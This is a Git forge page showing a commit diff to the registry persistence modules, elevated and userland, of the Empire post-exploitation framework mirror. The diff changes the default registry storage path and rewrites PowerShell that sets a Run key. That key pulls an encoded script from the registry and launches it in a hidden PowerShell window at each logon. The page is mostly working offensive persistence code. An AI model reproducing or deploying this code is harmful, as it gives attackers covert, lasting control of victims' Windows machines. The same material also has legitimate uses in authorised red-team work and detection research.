infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update registry.py 

Updated to fix execution of registry key

fixed registry parsing
1.6
enigma0x3 2015-08-12 18:30:08 -04:00 committed by sixdub
parent 4572513129
commit afe64910a3
2 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
lib/modules/persistence/elevated/registry.py
View File

@ -50,7 +50,7 @@ class Module:
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
@ -199,8 +199,8 @@ class Module:
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"start -Win Hidden -A \"-enc "+locationString+"\" powershell\"';"
script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
script += "'Registry persistence established "+statusMsg+"'"
return script
return script

4
lib/modules/persistence/userland/registry.py
View File

@ -50,7 +50,7 @@ class Module:
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKCU:Software\Microsoft\Windows\CurrentVersion\Run'
'Value' : 'HKCU:Software\Microsoft\Windows\CurrentVersion\Debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
@ -229,7 +229,7 @@ class Module:
# set the run key to extract the encoded script from the specified location
# and start powershell.exe in the background with the encoded command
script += "$null=Set-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \"-enc $x\" powershell\"';"
script += "$null=Set-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
script += "'Registry persistence established "+statusMsg+"'"